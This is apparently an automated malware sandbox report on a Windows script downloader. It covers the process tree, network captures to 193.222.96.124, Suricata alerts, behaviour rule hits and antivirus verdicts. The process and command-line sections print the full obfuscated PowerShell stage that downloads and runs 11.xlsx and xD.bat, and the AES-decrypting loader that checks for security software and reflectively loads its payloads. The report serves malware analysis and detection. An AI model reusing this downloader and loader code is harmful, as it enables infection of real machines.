Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 9, 2024, 10:59 a.m. | May 9, 2024, 11:05 a.m. |
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ, $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhmTj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,45978,46019,46016,46012,46021,46027));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.DownloadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTrBupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabOaTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNuruHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjToureJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe){Invoke-Item $alhWjToureJPvdZsBUe;}Else{ $GuMutFsCYQ = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,45960,45960,45957,46031,46019,46026,46031));lCfBYm $alhWjToureJPvdZsBUe $GuMutFsCYQ;Invoke-Item $alhWjToureJPvdZsBUe;};$hAnIYx = $MREPVsahkPX + 'xD.bat'; if (Test-Path -Path $hAnIYx){tegHetozGCLG $hAnIYx;}Else{ $KeXJYIz = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,46031,45979,45957,46009,46008,46027));lCfBYm $hAnIYx 
$KeXJYIz;tegHetozGCLG $hAnIYx;};;;;}vbCETHtlMccKpmVgu;
2656-
EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
2816 -
-
-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 
5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
2116 -
powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2068
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1452
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
193.222.96.124 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 193.222.96.124:7287 -> 192.168.56.101:49163 | 2400036 | ET DROP Spamhaus DROP Listed Traffic Inbound group 37 | Misc Attack |
TCP 192.168.56.101:49163 -> 193.222.96.124:7287 | 2027254 | ET INFO Dotted Quad Host XLSX Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID |
file | C:\Users\test22\AppData\Roaming\11.xlsx |
file | C:\Users\test22\AppData\Roaming\~$11.xlsx |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\11.xlsx.LNK |
file | C:\Users\test22\AppData\Roaming\xD.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\11.xlsx.LNK |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Roaming.LNK |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 
5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); " |
cmdline | C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat" |
cmdline | powershell.exe -ExecutionPolicy UnRestricted function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ, $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhmTj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,45978,46019,46016,46012,46021,46027));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.DownloadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTrBupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabOaTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNuruHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjToureJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe){Invoke-Item $alhWjToureJPvdZsBUe;}Else{ $GuMutFsCYQ = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,45960,45960,45957,46031,46019,46026,46031));lCfBYm $alhWjToureJPvdZsBUe $GuMutFsCYQ;Invoke-Item $alhWjToureJPvdZsBUe;};$hAnIYx = $MREPVsahkPX + 'xD.bat'; if (Test-Path -Path $hAnIYx){tegHetozGCLG $hAnIYx;}Else{ $KeXJYIz = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,46031,45979,45957,46009,46008,46027));lCfBYm $hAnIYx $KeXJYIz;tegHetozGCLG 
$hAnIYx;};;;;}vbCETHtlMccKpmVgu; |
cmdline | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ, $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhmTj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,45978,46019,46016,46012,46021,46027));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.DownloadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTrBupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabOaTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNuruHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjToureJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe){Invoke-Item $alhWjToureJPvdZsBUe;}Else{ $GuMutFsCYQ = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,45960,45960,45957,46031,46019,46026,46031));lCfBYm $alhWjToureJPvdZsBUe $GuMutFsCYQ;Invoke-Item $alhWjToureJPvdZsBUe;};$hAnIYx = $MREPVsahkPX + 'xD.bat'; if (Test-Path -Path $hAnIYx){tegHetozGCLG $hAnIYx;}Else{ $KeXJYIz = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,46031,45979,45957,46009,46008,46027));lCfBYm $hAnIYx 
$KeXJYIz;tegHetozGCLG $hAnIYx;};;;;}vbCETHtlMccKpmVgu; |
Data received | HTTP/1.1 200 OK |
Data received | Content-Length: 18710 Content-Type: application/octet-stream Connection:close PK ! bîh^ [Content_Types].xml ¢( ¬ËNÃ0E÷HüCä-Jܲ@5íÇ*Q>ÀÄƪc[iiÿûB¡j7±ÏÜ{2ñÍh²nm¶Æ»RÈÀU^7/ÅÇì%¿rZYï @1__f q·ÃR4DáAJ¬h>ãÚÇVßƹªZ¨9ÈÛÁàNVÞ8Ê©ÓãÑÔji){^óã-I"{Üv^¥P!XS)bR¹rúK¾s(¸3Õ`cÞ0½ÝÎß»¾7M4²©ôªZÆk+¿|\|z¿(ôPúº6h_-[@!ÒØ Pk´2nÏ}Ä?£LËð Ýû%áÄßdºdN"m,à¥ÇDO97*~§Èɸ8ÀOíc|n¦ÑäEøÿöéºóÀBÉÀ!$}íàÈé;{ìÐå[îñé2þ ÿÿ PK ! µU0#ô L _rels/.rels ¢( ¬MOÃ0ïHüÈ÷ÕÝBKwAH»!T~Iܵ£$Ý¿'TG½~üÊÛÝ<êÈ!öâ4¬;#¶wúqu*&rFq¬áÄvÕõÕöGJy(v½*«¸¨¡KÉß#FÓñD±Ï.W ¥=ZÆMYÞbø®ÕBSí°·7 êÏצé ?9LìÒÈsbgÙ®|Èl!õùUSh9i°br:"y_dlÀóD¿ý|-NÈR"4ø2ÏGÇ% õZ´4ñËyÄ7 ëÈðÉ¨Þ ÿÿ PK ! Ò§¬Úú Ò xl/workbook.xml¬UÛn£0}_iÿùb Tm¥îªêõ%ÒʧXÌÚ¦IUõßwLJ¯/Ýv#âÛã33ÇÃáÑ®®¬[&MÈFkrQðæ&F{,¥iSÐJ4,FwL¡£é÷o[!7+!6 4*F¥Ömä8*/YMÕhYµ5Õ07j%£ *Óuå¸NMyöüX¯yÎ2w5kôD²j ¯JÞªÎ?WS¹éZ;u+^q}×"«Î£ãFHºªÀíñ'?ÁиÃI`zwTÍs)Xëvö¤ßùO°CÈ«ìÞÇàcH#Ù-79|b%O² °g0¿F@Z½V |
Data received | Content-Length: 66709 Content-Type: application/octet-stream Connection:close @echo off set "XYwABq=setocjVd ocjVduocjVdnSiocjVd=1 ocjVd&ocjVd& ocjVdstocjVdarocjVdt "ocjVd"ocjVd /mocjVdinocjVd ocjVd" set "aHbyse=&& ocjVdeocjVdxiocjVdtocjVd" set "YnfQeG=noocjVdtocjVd deocjVdfiocjVdnocjVdedocjVd uocjVdnSocjVdiocjVd if %YnfQeG:ocjVd=% (%XYwABq:ocjVd=%%0 %aHbyse:ocjVd=%) ::BeF5ow87uxWaOVsDX34hfHMzjY9LyYGJF8taUicqnOUHe1k+/C8bjfy7DRK1pgkPdtgP565bb9l1s/5bJA7EJV5U6XEOWyzY6nThjd5rAl67iErFaOrBOKOOvdUPLJj8yPws2zLhtzEujD588yBkMTMx9HC7KYAklXvPVSNdG4Ol54BuJusY/AB0kfUsR+J3koGkeRUT1m/s1AGQOaLusuZeFaFfqfOgHpgq7TWGba/B0JufgZ8a03iTDlDWnrdqh2GKb57hz7eEfEly+VXCXMdddlc9J45dLdABoTiyQ7tfKj+LXWZC52OxM+5SHVic+xXDN5nAoZvbK/WoU7y7u8SoviIS/X96YgW7R51EmhMNDPybjPit63dj4eQKo7jvhETMkWsBhp2sx6y5PKShUekyFY3WrjwAYffrkA1ZKo4qhj9rOXtHrlTCj7j+iU4uG3zFw44eGfmGvCOqUOe+iJYfFfouIEKHMg1ixaf87l4kXIlLMjjXoNn/0XJ/Tvt/eC77/MjMi9SAUg9Uvch+74mglxEvZU9GiucPSPzDflPSEhSVYj+OjkUob54YgRgL8HhhRHRlikAAyyPxSeJ18Md/asnK53hPVc49qolIY83tG3Fa2wXtEDSIitt8RQF2lWZj9HImAs0tVqmA9z+qMnbKbXy3WpYrVALWMakVYEiW7OwjVuO0Kqb7nqAtFR1MZfgeSVRWKzD5beSDoeJNUhVzs1eGAdJljUSuQnuWucaWBd9uoJcaLnGgfV0X4N9WQPwYjGd4naPDIIBYVcBweC0CoK10uOtSFiJzSqbEISWOAualyz/A6eGRHKkxaKl5F83Kp+Qillri9trdzPAGb/1ZNd54J4hbx7QR7tsfmN90wm+BevEvIzZkbF9ipwoMjAU0/BuB4PbSNely5xw5HFyyacehUXMDrtUAbDDjiwobB6dXeIO+eq1Rm6GfDNrjPcBRjphgjtQ2Qsvs1VG/3BDMIYSV4/H74I9rnWNkqo6QwwUh8bHzllBe4jhdKjthpI/OVi56Z8shqld6zR5Wt4eOYbm5I5DgS9IpwixY1Br1hQ4gyTRaYz6HDm1eo4sltb+EE9RGy2N/FfPPL7ysZD806HIwu7+uUkUUpZ5tJwAff1jVoGtkODQVN+QILsb3juCRaDB+TFoEHsJnEU8ITH19TURHoVvTOjLLn5xOhcU2etBUHlsHZ2klEydvXgRWL8yON4Oqz1CQdT+HirAYGaXn5fnWgNU09dXarADPEUOxcDVIuGWMg2p0/wgf+ANkBwdr0gCLjdlYUDpIUagoSl1jhs7FadaSS3QCJlPh4CDOePaN2gRMGEIUg3JBLnQcwSDfof61zglFwhS9jTs0fkiYuFDFEjL0dgCWNGNQG1yKdGXEEJ61RU3kqgiliOx6WjzbDggnVhbn+R4d0uExP990QRPusO5LR6Ev8aCyBSA/MjCuNayqaI843sPM52AEfQcDpmW3mlIO1A4ntSRwqL3sV7GRvd7DocYOUqDSxan9neGhuCtgrMuOus2VoqvRU7d0xyfqo5bs4SIW7qksuPW5DgQUJXm1bRTmn/kHDzJ0/4hWYV28Skzo8qT4wQcayI7I9iGl0jjY
FrGiCgPQdMZx23/0Sesm4HQSpaIGOlUKBzR0/uP3jrPu0JlxkEZDairsQxmeFmpFOMx5j/vrwNgrL74iaFGGkynwqD2M2ivdpiR7Z8BgoKz8trnfXTo3H1IUB9KfnHjxFVN2CFHq/ |
Data sent | GET /11.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive |
Data sent | GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287 |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate privileges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
host | 193.222.96.124 |
file | C:\Users\test22\AppData\Roaming\11.xlsx |
file | C:\Users\test22\AppData\Roaming\xD.bat |
cve | CVE-2013-3906 |
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\11.xlsx | ||||||
parent_process | powershell.exe | martian_process | "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Roaming\xD.bat" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Roaming\xD.bat |
option | -w hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Cynet | Malicious (score: 99) |
Skyhigh | HTA/Downloader.f |
ALYac | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
ESET-NOD32 | VBS/Agent.QVR |
McAfee | HTA/Downloader.f |
Avast | Script:SNH-gen [Drp] |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
MAX | malware (ai score=82) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |